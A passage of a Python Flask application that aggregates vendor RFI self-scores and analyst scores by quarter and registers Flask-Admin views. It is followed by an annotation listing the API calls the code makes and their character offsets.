current_ss = last_self_score(vendorid, item2[0], current_quarter, current_year)
category_ss_sum += current_ss
category_ss_len += 1
total_suitemod_ss_sum += current_ss
total_suitemod_ss_len += 1
except TypeError: pass
try: category_ss_average = category_ss_sum/category_ss_len
except ZeroDivisionError: category_ss_average = '-'
categories_ss_averages.append(category_ss_average)
total_suitemod_ss_average = total_suitemod_ss_sum/total_suitemod_ss_len
categories_ss_averages.append(total_suitemod_ss_average)
print(categories_ss_averages)
categories_last_quarter_averages = []
categories_sm_averages = []
categories_benchmark_averages = []
for item in range(0,11):
categories_last_quarter_averages.append('lq' + str(item))
categories_sm_averages.append('sm' + str(item))
categories_benchmark_averages.append('b' + str(item))
print(categories_last_quarter_averages, categories_sm_averages, categories_benchmark_averages)
summary_table = []
for item1, item2, item3, item4, item5 in zip(categories_names, categories_ss_averages, categories_last_quarter_averages, categories_sm_averages, categories_benchmark_averages): summary_table.append([item1, item2, item3, item4, item5])
print(summary_table)
'''rfielements_info:
0 vendor_id
1 smce_id
2 quarter
3 year
4 round
5 self_score
6 self_description
7 attachment_id
8 sm_score
9 analyst_notes
'''
#rfielements_info_raw = rfielements.query.filter_by(vendor_id = vendorid).filter(rfielements.smce_id.in_(smce_ids_list)).add_columns(rfielements.vendor_id, rfielements.smce_id, rfielements.quarter, rfielements.year, rfielements.round, rfielements.self_score, rfielements.self_description, rfielements.attachment_id, rfielements.sm_score, rfielements.analyst_notes).all()
rfielements_providers_info_raw = rfielements_providers.query.filter_by(vendor_id = vendorid).filter(rfielements_providers.smce_id.in_(smce_ids_list)).add_columns(rfielements_providers.vendor_id, rfielements_providers.smce_id, rfielements_providers.quarter, rfielements_providers.year, rfielements_providers.round, rfielements_providers.self_score, rfielements_providers.self_description, rfielements_providers.attachment_id).all()
rfielements_analysts_info_raw = rfielements_analysts.query.filter_by(vendor_id = vendorid).filter(rfielements_analysts.smce_id.in_(smce_ids_list)).add_columns(rfielements_analysts.vendor_id, rfielements_analysts.smce_id, rfielements_analysts.quarter, rfielements_analysts.year, rfielements_analysts.round, rfielements_analysts.sm_score, rfielements_analysts.analyst_notes).all()
#df = pd.DataFrame(rfielements_info_raw)
df_providers = pd.DataFrame(rfielements_providers_info_raw)
df_providers = df_providers.where(df_providers.notnull(), None) #if there was a row with only a SD but not a SS: the SS appeared as nan
#df_providers['self_score'].astype(np.int64)
df_analysts = pd.DataFrame(rfielements_analysts_info_raw)
df_analysts = df_analysts.where(df_analysts.notnull(), None)
#df['yqr'] = df['year'].astype(str) + '-' + df['quarter'].astype(str) + '-' + df['round'].astype(str)
df_providers['yqr'] = df_providers['year'].astype(str) + '-' + df_providers['quarter'].astype(str) + '-' + df_providers['round'].astype(str)
df_analysts['yqr'] = df_analysts['year'].astype(str) + '-' + df_analysts['quarter'].astype(str) + '-' + df_analysts['round'].astype(str)
#yqdict = dict()
#for item in df.yqr.unique():
# yqdict[item] = df[df.yqr == item].drop(columns=['rfielements', 'vendor_id', 'quarter', 'year', 'round', 'smce_id', 'yqr']).dropna(how='all', axis=1)
yqdict_providers = dict()
for item in df_providers.yqr.unique():
yqdict_providers[item] = df_providers[df_providers.yqr == item].drop(columns=['rfielements_providers', 'vendor_id', 'quarter', 'year', 'round', 'smce_id', 'yqr']).dropna(how='all', axis=1)
yqdict_analysts = dict()
for item in df_analysts.yqr.unique():
yqdict_analysts[item] = df_analysts[df_analysts.yqr == item].drop(columns=['rfielements_analysts', 'vendor_id', 'quarter', 'year', 'round', 'smce_id', 'yqr']).dropna(how='all', axis=1)
#yqr_headers_dicts = [ {item:yqdict[item].columns.tolist()} for item in sorted(yqdict.keys()) ]
#print('yqr_headers_dicts', yqr_headers_dicts)
yqr_headers_providers_dicts = [ {item:yqdict_providers[item].columns.tolist()} for item in sorted(yqdict_providers.keys()) ]
print('yqr_headers_providers_dicts', yqr_headers_providers_dicts)
yqr_headers_analysts_dicts = [ {item:yqdict_analysts[item].columns.tolist()} for item in sorted(yqdict_analysts.keys()) ]
print('yqr_headers_analysts_dicts', yqr_headers_analysts_dicts)
#merge yqr_headers_providers_dicts and yqr_headers_analysts_dicts into yqr_headers_dicts
yqr_headers_dicts_unsorted = yqr_headers_providers_dicts
for item_analysts in yqr_headers_analysts_dicts:
for item in yqr_headers_dicts_unsorted:
if list(item_analysts.keys())[0] in item:
for item2 in item_analysts.get(list(item_analysts.keys())[0]):
item[list(item_analysts.keys())[0]].append(item2)
break
else:
yqr_headers_dicts_unsorted.append(item_analysts)
break
#sort yqr_headers_dict
keys_list = []
for item in yqr_headers_dicts_unsorted: keys_list.append(list(item.keys())[0])
keys_list.sort()
yqr_headers_dicts = []
for item1 in keys_list:
for item2 in yqr_headers_dicts_unsorted:
if item1 == list(item2.keys())[0]:
print('yes', item1, item2)
yqr_headers_dicts.append({item1: item2[item1]})
break
print('final yqr_headers_dict: ', yqr_headers_dicts)
#delete current_year & current_quarter item
indexes = [] #this will be necessary in case we have to delete two rounds
for index, dictionary in enumerate(yqr_headers_dicts):
for key in dictionary:
if int(key.split('-')[0]) == current_year and int(key.split('-')[1]) == current_quarter:
indexes.append(index)
for index in reversed(indexes): #it must be backwards since we are removing elements from the list.
del yqr_headers_dicts[index]
yq_headers2 = []
yqr_headers_len = []
for item in yqr_headers_dicts:
yq_headers2.append(list(item.keys()))
yqr_headers_len.append(len(list(item.values())[0]))
print('yqr_headers_len', yqr_headers_len)
for item1, item2 in zip(yq_headers2, yqr_headers_len): item1.append(item2)
#print('yq_headers2', yq_headers2)
yq_headers = []
for item in yq_headers2:
if [item[0].split('-')[0] + '-' + item[0].split('-')[1]] not in yq_headers: yq_headers.append([item[0].split('-')[0] + '-' + item[0].split('-')[1]])
for item in yq_headers: item.append(0)
for item1 in yq_headers2:
aux = item1[0].split('-')[0] + '-' + item1[0].split('-')[1]
for item2 in yq_headers:
if aux == item2[0]:
item2[1] += item1[1]
break
for item in yq_headers: item[0] = [item[0].split('-')[0], item[0].split('-')[1]]
#yq_headers will define the fist header.
print('yq_headers', yq_headers)
#yqr_headers will define the second header
yqr_headers2 = []
yqr_headers_columns = []
yqr_headers3 = []
yqr_headers=[]
for item in yqr_headers_dicts:
yqr_headers2.append(list(item.keys()))
yqr_headers_columns.append(list(item.values())[0])
for item1 in yqr_headers_columns:
for item2 in range(len(item1)):
if item1[item2] == 'self_score': item1[item2] = 5
elif item1[item2] == 'self_description': item1[item2] = 6
elif item1[item2] == 'attachment_id': item1[item2] = 7
elif item1[item2] == 'sm_score': item1[item2] = 8
elif item1[item2] == 'analyst_notes': item1[item2] = 9
for item1, item2 in zip(yqr_headers2, yqr_headers_columns): yqr_headers3.append(((int(item1[0].split('-')[0]), int(item1[0].split('-')[1]), int(item1[0].split('-')[2])), item2))
for item1 in yqr_headers3:
for item2 in item1[1]:
yqr_headers.append((item1[0], item2))
#print('yqr_headers3', yqr_headers3)
print('yqr_headers_columns', yqr_headers_columns)
print('yqr_headers', yqr_headers)
#for item1 in ids_list:
#for item2 in item1[1]:
#print('smceid', item2[0], 'variantid', item2[2] ,elementvariants.query.filter_by(variantid = item2[2]).add_columns(elementvariants.example_scoring).first()[1])
width = 3 + len(yqr_headers)
info = [] #[category,[element_name, spec, example scoring, ss_q1y1, sd_q1y1, at_q1y1, sm_q1y1, an_q1y1, ss_q2y1, sd_q2y1, at_q2y1, sm_q2y1, an_q2y1...], smceid, [ss_current_round_1] ]
for item1 in ids_list:
cat_name_id = suitemodcat.query.filter_by(suitemodcatid = item1[0]).add_columns(suitemodcat.category_name_id).first()[1]
cat_name = category_names.query.filter_by(category_nameid = cat_name_id).add_columns(category_names.category_name).first()[1]
info.append([cat_name, item1[0]])
for item2 in item1[1]:
row = []
elem_name = element_names.query.filter_by(element_nameid = item2[1]).add_columns(element_names.elementname).first()[1]
row.append([elem_name])
spec = elementvariants.query.filter_by(variantid = item2[2]).add_columns(elementvariants.specification).first()[1]
row[0].append(spec)
es = elementvariants.query.filter_by(variantid = item2[2]).add_columns(elementvariants.example_scoring).first()[1]
row[0].append(es)
data = None
'''for item3 in yqr_headers:
col = None
if item3[1] == 5: col = 'self_score'
elif item3[1] == 6: col = 'self_description'
elif item3[1] == 7: col = 'attachment_id'
elif item3[1] == 8: col = 'sm_score'
elif item3[1] == 9: col = 'analyst_notes'
try:
data = df.loc[(df['smce_id'] == item2[0]) & (df['year'] == item3[0][0]) & (df['quarter'] == item3[0][1]) & (df['round'] == item3[0][2]), col].tolist()[0]
except:
data = None
row[0].append(data)'''
for item3 in yqr_headers:
col = None
if item3[1] == 5 or item3[1] == 6 or item3[1] == 7:
if item3[1] == 5: col = 'self_score'
elif item3[1] == 6: col = 'self_description'
elif item3[1] == 7: col = 'attachment_id'
try:
if item3[1] == 5: #do self_score alone because it is an integer, but since it has to pass through pandas, it is converted to float. So now we remove the .0 doing int(). If it was null, it would go to except and get a None
data = int(df_providers.loc[(df_providers['smce_id'] == item2[0]) & (df_providers['year'] == item3[0][0]) & (df_providers['quarter'] == item3[0][1]) & (df_providers['round'] == item3[0][2]), col].tolist()[0])
else:
data = df_providers.loc[(df_providers['smce_id'] == item2[0]) & (df_providers['year'] == item3[0][0]) & (df_providers['quarter'] == item3[0][1]) & (df_providers['round'] == item3[0][2]), col].tolist()[0]
except:
data = None
row[0].append(data)
elif item3[1] == 8 or item3[1] == 9:
if item3[1] == 8: col = 'sm_score'
elif item3[1] == 9: col = 'analyst_notes'
try:
if item3[1] == 8 and int(df_analysts.loc[(df_analysts['smce_id'] == item2[0]) & (df_analysts['year'] == item3[0][0]) & (df_analysts['quarter'] == item3[0][1]) & (df_analysts['round'] == item3[0][2]), col].tolist()[0]) == df_analysts.loc[(df_analysts['smce_id'] == item2[0]) & (df_analysts['year'] == item3[0][0]) & (df_analysts['quarter'] == item3[0][1]) & (df_analysts['round'] == item3[0][2]), col].tolist()[0]: #same as with self_score
data = int(df_analysts.loc[(df_analysts['smce_id'] == item2[0]) & (df_analysts['year'] == item3[0][0]) & (df_analysts['quarter'] == item3[0][1]) & (df_analysts['round'] == item3[0][2]), col].tolist()[0])
else:
data = df_analysts.loc[(df_analysts['smce_id'] == item2[0]) & (df_analysts['year'] == item3[0][0]) & (df_analysts['quarter'] == item3[0][1]) & (df_analysts['round'] == item3[0][2]), col].tolist()[0]
except:
data = None
row[0].append(data)
row.append(item2[0]) #appending smceid
#append current_rounds or [None, None...]
'''try:
current_round_1 = rfielements.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 1).order_by(desc(rfielements.update_date)).add_columns(rfielements.self_score, rfielements.self_description, rfielements.attachment_id, rfielements.sm_score, rfielements.analyst_notes).first()[1:6]
except:
current_round_1 = [None, None, None, None, None]
row.append(current_round_1)
try:
current_round_2 = rfielements.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 2).order_by(desc(rfielements.update_date)).add_columns(rfielements.self_score, rfielements.self_description, rfielements.attachment_id, rfielements.sm_score, rfielements.analyst_notes).first()[1:6]
except:
current_round_2 = [None, None, None, None, None]
row.append(current_round_2)'''
#append current_rounds or [None, None...]
try: current_round_1_providers = rfielements_providers.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 1).order_by(desc(rfielements_providers.update_date)).add_columns(rfielements_providers.self_score, rfielements_providers.self_description, rfielements_providers.attachment_id).first()[1:4]
except: current_round_1_providers = [None, None, None]
try: current_round_1_analysts = rfielements_analysts.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 1).order_by(desc(rfielements_analysts.update_date)).add_columns(rfielements_analysts.sm_score, rfielements_analysts.analyst_notes).first()[1:3]
except: current_round_1_analysts = [None, None]
current_round_1 = []
for item in current_round_1_providers: current_round_1.append(item)
for item in current_round_1_analysts: current_round_1.append(item)
row.append(current_round_1)
'''try:
current_round_2 = rfielements.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 2).order_by(desc(rfielements.update_date)).add_columns(rfielements.self_score, rfielements.self_description, rfielements.attachment_id, rfielements.sm_score, rfielements.analyst_notes).first()[1:6]
except:
current_round_2 = [None, None, None, None, None]
row.append(current_round_2)'''
try: current_round_2_providers = rfielements_providers.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 2).order_by(desc(rfielements_providers.update_date)).add_columns(rfielements_providers.self_score, rfielements_providers.self_description, rfielements_providers.attachment_id).first()[1:4]
except: current_round_2_providers = [None, None, None]
try: current_round_2_analysts = rfielements_analysts.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 2).order_by(desc(rfielements_analysts.update_date)).add_columns(rfielements_analysts.sm_score, rfielements_analysts.analyst_notes).first()[1:3]
except: current_round_2_analysts = [None, None]
current_round_2 = []
for item in current_round_2_providers: current_round_2.append(item)
for item in current_round_2_analysts: current_round_2.append(item)
row.append(current_round_2)
#append [Current SS, Current SM]
try:
'''row_number_column = func.row_number().over(partition_by=(rfielements_providers.vendor_id, rfielements_providers.smce_id), order_by=(desc(rfielements_providers.year), desc(rfielements_providers.quarter), desc(rfielements_providers.round), desc(rfielements_providers.update_date))).label('row_order')
current_ss = rfielements_providers.query.with_entities(rfielements_providers.self_score, row_number_column).filter_by(vendor_id = vendorid, smce_id = item2[0]).filter(or_(rfielements_providers.year < current_year, and_(rfielements_providers.year == current_year, rfielements_providers.quarter <= current_quarter))).from_self().filter(row_number_column == 1).first()[0]'''
current_ss = last_self_score(vendorid, item2[0], current_quarter, current_year)
except TypeError: current_ss = None
try: current_sm_score = last_sm_score(vendorid, item2[0], current_quarter, current_year)
except TypeError: current_ss = None
row.append([current_ss, current_sm_score])
row.append(item1[0]) #suitemodcatid, will be row[5] in order to make jinja2 & jquery work.
info.append(row)
#print('info\n', info)
modified_smceids = []
if request.method == 'POST' and "submit_button" in request.form: #When the button 'Submit updates' is pressed
for item1 in info:
if len(item1) != 2: #when a category, len of the list will be 2: [category_name, ?category_name_id?]
change = 0 #flag to update current element
#Check if there is a change in SS
if request.form['ss-' + str(current_round) + '-' + str(item1[1])] == "" and item1[1+current_round][0] != None: #if there was a SS but now it's NULL
new_ss = None
change = 1
elif request.form['ss-' + str(current_round) + '-' + str(item1[1])] != "" and item1[1+current_round][0] != int(request.form['ss-' + str(current_round) + '-' + str(item1[1])]): #if the SS has changed from one number to another
new_ss = int(request.form['ss-' + str(current_round) + '-' + str(item1[1])])
change = 1
else: new_ss = item1[1+current_round][0] #just in case there is a change in SD, it's not really a new SS
#Check if there is a change in SD
if request.form['sd-' + str(current_round) + '-' + str(item1[1])] == "" and item1[1+current_round][1] != None: #if there was a SD but now it's NULL
new_sd = None
change = 1
elif request.form['sd-' + str(current_round) + '-' + str(item1[1])] != "" and item1[1+current_round][1] != request.form['sd-' + str(current_round) + '-' + str(item1[1])]: #if the SD has changed
new_sd = request.form['sd-' + str(current_round) + '-' + str(item1[1])]
change = 1
else: new_sd = item1[1+current_round][1] #just in case there is a change in SD, it's not really a new S
if change == 1:
element_row = rfielements_providers(vendor_id = vendorid, smce_id = item1[1], quarter = current_quarter, year = current_year, round = current_round, self_score = new_ss, self_description = new_sd, attachment_id = None, user_id = 1)
db.session.add(element_row)
modified_smceids.append(item1[1])
if len(modified_smceids) > 0:
db.session.commit()
print('commit done')
if len(modified_smceids) == 0:
flash('No updates where received')
elif len(modified_smceids) == 1:
flash('Updates saved for ' + str(len(modified_smceids)) + ' element')
elif len(modified_smceids) > 1:
flash('Updates saved for ' + str(len(modified_smceids)) + ' elements')
return redirect(urllib.parse.quote( url_for(request.endpoint) + vendor_name))
#testing helper
print("current_quarter_year", current_quarter, current_year)
print("previous_quarter_year", previous_quarter_year(current_quarter, current_year))
print("next_quarter_year", next_quarter_year(current_quarter, current_year))
'''
rfielements_info=[]
quarters_header = set()
for item in rfielements_info_raw:
rfielements_info.append([item[1], item[2], item[3], item[4], item[5], item[6], item[7], item[8], item[9], item[10]])
for item in rfielements_info:
quarters_header.add((item[3], item[2], item[4]))
quarters_header = sorted(quarters_header) #now it is a list, not a set anymore.
columns_perquarter = [ [] for _ in range(len(quarters_header))] #creating a list of dimension = number of quarters
columns_header = set()
for row in rfielements_info:
aux_tuple = (row[3], row[2], row[4])
if aux_tuple not in quarters_header:
sys.exit("Element's (year, quarter, round) is not in quarters_header")
else:
index = quarters_header.index(aux_tuple)
for i in range(5,10):
if row[i] is not None and i not in columns_perquarter[index]:
columns_perquarter[index].append(i)
columns_header.add((aux_tuple,i))
for i in range(len(quarters_header)):
quarters_header[i] = [quarters_header[i], None]
for quarter in columns_perquarter:
quarter = sorted(quarter)
for item1, item2 in zip(quarters_header, columns_perquarter):
item1[1] = item2
columns_header = sorted(columns_header)
#check everything is alright
if(sum(len(x) for x in columns_perquarter) != len(columns_header)):
sys.exit('columns_perquarter lenght != columns_header lenght')
del columns_perquarter #we moved it to quarters_header, we don't need it anymore.
rfielements_info_show = [ [None for _ in range(len(columns_header))] for _ in range(len(smce_ids_list)) ]
#print('rfielements_info', rfielements_info )
for row in rfielements_info:
index1 = smce_ids_list.index(row[1])
for j in range(5,10):
if row[j] is not None:
index2 = columns_header.index(((row[3], row[2], row[4]),j))
rfielements_info_show[index1][index2] = row[j]
print('quarters_header', quarters_header)
print('columns_header', columns_header)
'''
return render_template('rfi:vendor:module.html', title = title, vendor_name = vendor_name, module_name = module_name, urllib_parse_quote = urllib.parse.quote,
info = info, yq_headers = yq_headers, yqr_headers = yqr_headers, width = width, current_quarter = current_quarter, current_year = current_year,
status = status, current_round = current_round, form = form, modified_smceids = modified_smceids,
summary_table = summary_table)
db.init_app(app) #this was supposed to be inside if __name__ but it didn't work: https://stackoverflow.com/questions/30764073/sqlalchemy-extension-isnt-registered-when-running-app-with-gunicorn
mail.init_app(app) #same as db.init_app
admin = Admin(app, name='SolutionMap Admin', template_mode='bootstrap3')
class users_view(ModelView):
can_delete = False
page_size = 50
column_list = ['userid', 'email', 'user_type','assigned_vendor_id', 'password', 'update_date', 'active', 'registration_date', 'anonymized', 'private']
column_sortable_list = ['userid', 'email', 'user_type','assigned_vendor_id', 'password', 'update_date', 'active', 'registration_date', 'anonymized', 'private']
column_exclude_list = ['password' ]
class vendors_view(ModelView):
column_list = ['vendorid', 'vendor_name', 'quarter', 'year', 'update_date', 'active', 'parent_vendorid', 'vendor_weight']
page_size = 50
column_searchable_list = ['vendor_name']
column_filters = ['vendor_name', 'quarter', 'year']
can_view_details = True
column_editable_list = ['vendor_name', 'quarter', 'year'] #inline editing
create_modal = True
edit_modal = True
form_choices = {
'quarter': [
(1, '1'),
(2, '2'),
(3, '3'),
(4, '4')
],
'year': [
(2017, '2017'), (2018, '2018'), (2019, '2019')
]
}
can_export = True
class vendors_rfi_view(ModelView):
column_list = ['vendor_id', 'suitemod_id', 'quarter', 'year', 'status', 'current_round']
'''form_ajax_refs = {
'suitemod_id': {
'fields': ['suitemod_name'],
'page_size': 10
}
}'''
class rfielements_providers_view(ModelView):
column_list = ['vendor_id', 'smce_id', 'quarter', 'year', 'round', 'update_date', 'self_score', 'self_description', 'attachment_id', 'user_id']
page_size = 100
class current_quarteryear_view(ModelView):
column_list = ['quarter', 'year']
can_delete = False
can_create = False
edit_modal = True
column_editable_list = ['quarter', 'year']
form_choices = {
'quarter': [
(1, '1'),
(2, '2'),
(3, '3'),
(4, '4')
],
'year': [
(2017, '2017'), (2018, '2018'), (2019, '2019')
]
}
#admin.add_view(ModelView(users, db.session, name='Users'))
#admin.add_view(ModelView(vendors, db.session))
#admin.add_view(ModelView(vendors_rfi, db.session))
#admin.add_view(ModelView(rfielements_providers, db.session))
#admin.add_view(ModelView(rfielements_analysts, db.session))
admin.add_view(users_view(users, db.session, name = 'Users'))
admin.add_view(vendors_view(vendors, db.session, name = 'Vendors'))
admin.add_view(vendors_rfi_view(vendors_rfi, db.session, name = 'Vendors - RFI'))
admin.add_view(rfielements_providers_view(rfielements_providers, db.session, name = 'RFIelements - Providers'))
admin.add_view(current_quarteryear_view(current_quarteryear, db.session, name = 'Current QY'))
if __name__ == '__main__':
#before config:
#app.run(debug=True)
csrf.init_app(app) #this one after config
#db.init_app(app)
#mail.init_app(app)
with app.app_context():
db.create_all() #this will create every table that IS NOT created already
app.run()
|
[
"models.db.session.commit",
"flask.flash",
"models.db.init_app",
"models.db.session.add",
"flask_mail.Mail",
"forms.ElementForm",
"models.userstest.query.filter_by",
"models.category_names.query.filter_by",
"flask.url_for",
"helper.previous_quarter_year",
"pandas.set_option",
"models.suitemodcat.query.filter_by",
"pandas.DataFrame",
"helper.last_self_score",
"flask_admin.Admin",
"models.rfielements_providers",
"models.rfielements_analysts.query.filter_by",
"helper.next_quarter_year",
"models.suitemodcatelem.query.filter_by",
"models.db.create_all",
"flask.render_template",
"models.rfielements_providers.smce_id.in_",
"models.rfielements_analysts.smce_id.in_",
"threading.Thread",
"flask_mail.Message",
"models.current_quarteryear.query.add_columns",
"models.vendors_rfi.query.filter_by",
"models.elementvariants.query.filter_by",
"models.userstest",
"flask_wtf.CSRFProtect",
"helper.last_sm_score",
"models.vendors.query.filter_by",
"models.comments",
"models.suitemodules.query.filter_by",
"forms.LoginForm",
"sys.exit",
"forms.CommentForm",
"models.rfielements_providers.query.filter_by",
"forms.CreateForm",
"flask.session.pop",
"flask.Flask",
"models.comments.query.join",
"sqlalchemy.desc",
"sqlalchemy.create_engine",
"models.element_names.query.filter_by"
] |
[((1348, 1404), 'sqlalchemy.create_engine', 'create_engine', (['DevelopmentConfig.SQLALCHEMY_DATABASE_URI'], {}), '(DevelopmentConfig.SQLALCHEMY_DATABASE_URI)\n', (1361, 1404), False, 'from sqlalchemy import create_engine\n'), ((1522, 1571), 'pandas.set_option', 'pd.set_option', (['"""display.expand_frame_repr"""', '(False)'], {}), "('display.expand_frame_repr', False)\n", (1535, 1571), True, 'import pandas as pd\n'), ((1909, 1924), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (1914, 1924), False, 'from flask import Flask\n'), ((2457, 2473), 'flask_wtf.CSRFProtect', 'CSRFProtect', (['app'], {}), '(app)\n', (2468, 2473), False, 'from flask_wtf import CSRFProtect\n'), ((2540, 2546), 'flask_mail.Mail', 'Mail', ([], {}), '()\n', (2544, 2546), False, 'from flask_mail import Mail\n'), ((35823, 35839), 'models.db.init_app', 'db.init_app', (['app'], {}), '(app)\n', (35834, 35839), False, 'from models import db\n'), ((36066, 36130), 'flask_admin.Admin', 'Admin', (['app'], {'name': '"""SolutionMap Admin"""', 'template_mode': '"""bootstrap3"""'}), "(app, name='SolutionMap Admin', template_mode='bootstrap3')\n", (36071, 36130), False, 'from flask_admin import Admin\n'), ((2655, 2756), 'flask_mail.Message', 'Message', (['"""Thank you for signing up!"""'], {'sender': "app.config['MAIL_USERNAME']", 'recipients': '[user_email]'}), "('Thank you for signing up!', sender=app.config['MAIL_USERNAME'],\n recipients=[user_email])\n", (2662, 2756), False, 'from flask_mail import Message\n'), ((2799, 2847), 'flask.render_template', 'render_template', (['"""email.html"""'], {'username': 'username'}), "('email.html', username=username)\n", (2814, 2847), False, 'from flask import render_template\n'), ((4471, 4513), 'flask.render_template', 'render_template', (['"""index.html"""'], {'title': 'title'}), "('index.html', title=title)\n", (4486, 4513), False, 'from flask import render_template\n'), ((4873, 4902), 'forms.LoginForm', 'forms.LoginForm', (['request.form'], {}), '(request.form)\n', (4888, 4902), False, 'import forms\n'), ((5815, 5861), 'flask.render_template', 'render_template', (['"""login.html"""'], {'form': 'login_form'}), "('login.html', form=login_form)\n", (5830, 5861), False, 'from flask import render_template\n'), ((6203, 6234), 'forms.CommentForm', 'forms.CommentForm', (['request.form'], {}), '(request.form)\n', (6220, 6234), False, 'import forms\n'), ((6884, 6955), 'flask.render_template', 'render_template', (['"""comment.html"""'], {'title': 'title', 'comment_form': 'comment_form'}), "('comment.html', title=title, comment_form=comment_form)\n", (6899, 6955), False, 'from flask import render_template\n'), ((7039, 7069), 'forms.CreateForm', 'forms.CreateForm', (['request.form'], {}), '(request.form)\n', (7055, 7069), False, 'import forms\n'), ((7963, 8011), 'flask.render_template', 'render_template', (['"""create.html"""'], {'form': 'create_form'}), "('create.html', form=create_form)\n", (7978, 8011), False, 'from flask import render_template\n'), ((8512, 8591), 'flask.render_template', 'render_template', (['"""reviews.html"""'], {'comments': 'comment_list', 'date_format': 'date_format'}), "('reviews.html', comments=comment_list, date_format=date_format)\n", (8527, 8591), False, 'from flask import render_template\n'), ((2989, 3016), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (3004, 3016), False, 'from flask import render_template\n'), ((4613, 4636), 'flask.session.pop', 'session.pop', (['"""username"""'], {}), "('username')\n", (4624, 4636), False, 'from flask import session\n'), ((4670, 4686), 'flask.url_for', 'url_for', (['"""login"""'], {}), "('login')\n", (4677, 4686), False, 'from flask import url_for\n'), ((5959, 5989), 'flask.render_template', 'render_template', (['"""cookie.html"""'], {}), "('cookie.html')\n", (5974, 5989), False, 'from flask import render_template\n'), ((6647, 6704), 'models.comments', 'comments', ([], {'user_id': 'user_id', 'text': 'comment_form.comment.data'}), '(user_id=user_id, text=comment_form.comment.data)\n', (6655, 6704), False, 'from models import comments\n'), ((6738, 6761), 'models.db.session.add', 'db.session.add', (['comment'], {}), '(comment)\n', (6752, 6761), False, 'from models import db\n'), ((6764, 6783), 'models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (6781, 6783), False, 'from models import db\n'), ((6828, 6850), 'flask.flash', 'flash', (['success_message'], {}), '(success_message)\n', (6833, 6850), False, 'from flask import flash\n'), ((7137, 7229), 'models.userstest', 'userstest', (['create_form.username.data', 'create_form.password.data', 'create_form.email.data'], {}), '(create_form.username.data, create_form.password.data, create_form\n .email.data)\n', (7146, 7229), False, 'from models import userstest\n'), ((7242, 7262), 'models.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (7256, 7262), False, 'from models import db\n'), ((7320, 7339), 'models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (7337, 7339), False, 'from models import db\n'), ((7690, 7785), 'threading.Thread', 'threading.Thread', ([], {'name': '"""mail_sender"""', 'target': 'send_message', 'args': '(user.email, user.username)'}), "(name='mail_sender', target=send_message, args=(user.email,\n user.username))\n", (7706, 7785), False, 'import threading\n'), ((7931, 7953), 'flask.flash', 'flash', (['success_message'], {}), '(success_message)\n', (7936, 7953), False, 'from flask import flash\n'), ((11160, 11321), 'flask.render_template', 'render_template', (['"""rfi:vendor.html"""'], {'title': 'title', 'vendor_name': 'vendor_name', 'module_status_round': 'module_status_round', 'urllib_parse_quote': 'urllib.parse.quote'}), "('rfi:vendor.html', title=title, vendor_name=vendor_name,\n module_status_round=module_status_round, urllib_parse_quote=urllib.\n parse.quote)\n", (11175, 11321), False, 'from flask import render_template\n'), ((11934, 11965), 'forms.ElementForm', 'forms.ElementForm', (['request.form'], {}), '(request.form)\n', (11951, 11965), False, 'import forms\n'), ((16918, 16962), 'pandas.DataFrame', 'pd.DataFrame', (['rfielements_providers_info_raw'], {}), '(rfielements_providers_info_raw)\n', (16930, 16962), True, 'import pandas as pd\n'), ((17168, 17211), 'pandas.DataFrame', 'pd.DataFrame', (['rfielements_analysts_info_raw'], {}), '(rfielements_analysts_info_raw)\n', (17180, 17211), True, 'import pandas as pd\n'), ((35387, 35805), 'flask.render_template', 'render_template', (['"""rfi:vendor:module.html"""'], {'title': 'title', 'vendor_name': 'vendor_name', 'module_name': 'module_name', 'urllib_parse_quote': 'urllib.parse.quote', 'info': 'info', 'yq_headers': 'yq_headers', 'yqr_headers': 'yqr_headers', 'width': 'width', 'current_quarter': 'current_quarter', 'current_year': 'current_year', 'status': 'status', 'current_round': 'current_round', 'form': 'form', 'modified_smceids': 'modified_smceids', 'summary_table': 'summary_table'}), "('rfi:vendor:module.html', title=title, vendor_name=\n vendor_name, module_name=module_name, urllib_parse_quote=urllib.parse.\n quote, info=info, yq_headers=yq_headers, yqr_headers=yqr_headers, width\n =width, current_quarter=current_quarter, current_year=current_year,\n status=status, current_round=current_round, form=form, modified_smceids\n =modified_smceids, summary_table=summary_table)\n", (35402, 35805), False, 'from flask import render_template\n'), ((38886, 38901), 'models.db.create_all', 'db.create_all', ([], {}), '()\n', (38899, 38901), False, 'from models import db\n'), ((3608, 3624), 'flask.url_for', 'url_for', (['"""login"""'], {}), "('login')\n", (3615, 3624), False, 'from flask import url_for\n'), ((5359, 5381), 'flask.flash', 'flash', (['success_message'], {}), '(success_message)\n', (5364, 5381), False, 'from flask import flash\n'), ((5548, 5568), 'flask.flash', 'flash', (['error_message'], {}), '(error_message)\n', (5553, 5568), False, 'from flask import flash\n'), ((33270, 33322), 'helper.previous_quarter_year', 'previous_quarter_year', (['current_quarter', 'current_year'], {}), '(current_quarter, current_year)\n', (33291, 33322), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((33353, 33401), 'helper.next_quarter_year', 'next_quarter_year', (['current_quarter', 'current_year'], {}), '(current_quarter, current_year)\n', (33370, 33401), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((3801, 3817), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (3808, 3817), False, 'from flask import url_for\n'), ((5045, 5089), 'models.userstest.query.filter_by', 'userstest.query.filter_by', ([], {'username': 'username'}), '(username=username)\n', (5070, 5089), False, 'from models import userstest\n'), ((5468, 5484), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (5475, 5484), False, 'from flask import url_for\n'), ((9080, 9146), 'models.current_quarteryear.query.add_columns', 'current_quarteryear.query.add_columns', 